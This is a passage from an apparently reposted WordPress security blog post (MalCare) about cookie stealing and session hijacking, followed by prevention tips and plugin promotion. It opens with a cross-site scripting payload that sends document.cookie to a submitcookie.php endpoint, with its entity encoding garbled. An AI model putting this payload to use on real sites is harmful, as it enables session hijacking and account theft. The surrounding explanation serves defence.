document.write(‘&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;lt;img src=&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot;http://localhost/submitcookie.php? cookie =’

+ escape(document.cookie) + ‘&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;quot; /&amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;);

[/php]

In the comments section, this code will appear as an image. If you (as a visitor) click on it, you will see an image displayed. But there’s more than just happened.

When you click on the image, this PHP file silently executes the code and grabs your session cookie and the session ID.

Now the hacker can recreate your session and pose as you on that website. They can carry out a multitude of malicious acts. For example, if your cookie contains your credit card or any other payment information, they can make purchases.

Luckily, there are preventive measures to safeguard website owners as well as its visitors from these hacks.

Never click on suspicious links in the comments section of websites and in emails. You could become a victim of cookie theft.Click to Tweet

[Back to Top ]

 

 

How To Prevent Cookie Stealing And Session Hijacking?

There are two parties that play a role in preventing cookie theft and session hijacking – the website owner and the visitor. We’ll discuss preventive measures for both sides.

 Measures Website Owners Can Take Against Cookie Stealing

As a website owner, if you don’t have a security analyst to handle it all for you, you need to implement the following preventive measures:

1. Install an SSL Certificate

Data is transferred constantly between the user’s browser and your web server. Without SSL, this data (cookies) is sent in plain text. If a hacker intercepts this data, they can simply read it. So if it contains login credentials, it will be exposed.

 

 

SSL (Secure Sockets Layer) will encrypt the data before it’s transferred. So even if a hacker manages to steal it, they can’t read the data.

You can get an SSL certificate through your web hosting company or from an SSL provider. You can also get a basic free SSL certificate from Let’s Encrypt.

2. Install a Security Plugin

Keep a WordPress security plugin such as MalCare active on your website. The plugin’s firewall will prevent hack attempts on your website and block malicious IP addresses. Plus, it will scan your site regularly and alert you if any malicious code has been entered by a hacker. You can clean up your website instantly. This will help you detect and delete such hack attempts immediately before they cause any harm.

3. Update Your Website

Always keep your website up to date, this includes the WordPress installation, themes, and plugins. Running on outdated software opens many vulnerable spots on your website that hackers can exploit. Ensure you update your site as and when a new update is available.

 

 

These updates not only carry new features and bug fixes, but they also fix security flaws from time to time.

4. Harden Your Website

WordPress.org recommends certain website hardening measures that you should implement on your website. This includes using strong and unique usernames and strong passwords, blocking PHP execution in unknown folders, disabling the file editor in themes and plugins and more. Now, this may all sound like jargon to you so we’ve created an in-depth step by step guide to WordPress Hardening that you can follow.

[Back to Top ]

 

 

Steps Website Visitors Can Take Against Cookie Stealing

As a website visitor, you don’t have to blindly trust that websites have taken appropriate security measures. You can protect yourself with the following web security protocols.

1. Install an Effective Anti-virus

Ensure the device you’re using to access the internet has anti-malware software installed. This will alert you if malware is detected when you visit a malicious website. It will also remove any malware that you might accidentally download or install on your system.

2. Never Click on Suspicious Links

Hackers target users through the comments section on websites and through emails. Avoid clicking on untrusted links especially ones that lure you with attractive offers or discounts.

3. Avoid Storing Sensitive Data

Storing credit card information on shopping websites makes checkout faster and more convenient. Saving passwords on web browsers like Google Chrome to auto log into websites eliminates the need to remember passwords!

But it all comes with a high risk of being stolen. It’s best to never store sensitive data on websites. It may save you a few seconds, but it also puts you at risk of being attacked.

4. Clear Cookies

You can clear your cookies regularly to get rid of any sensitive information stored in browsers like Google Chrome. Access History > Clear Browsing History. Here, tick the checkbox ‘Cookies and other site data’.

 

 

Choose the time range ‘All Time’ or one that is according to your preference. Next, click ‘Clear data’ and the cookies will be deleted from your browser’s history.

That brings us to an end to cookie stealing. We hope this article has helped you gain a better understanding of what exactly happens and how to prevent it.

This guide from MalCare helped me understand cookie stealing and how to take preventive measures against it. Check it out.Click to Tweet

[Back to Top ]

 

Final Thoughts

As a website owner, you need to take protective measures to secure your own interests as well as your visitors, clients, and customers. But we understand that setting up a website and managing it is a hard task.

There is an endless number of things to take care of which is why WordPress security tends to take a backseat many times.

But ignoring the security aspect of your website can prove to be disastrous to all your other efforts.

An easy, quick and efficient solution is the MalCare security plugin. You can think of it as a security guard that you hire. It will work round the clock to regularly scan your website and protect it from attacks. You can rest assured that your website is in safe hands.


Keep your WordPress site protected with 
MalCare!

블로그 이미지

remoted

Remoted's IT LAB & POST DATABASE

댓글을 달아 주세요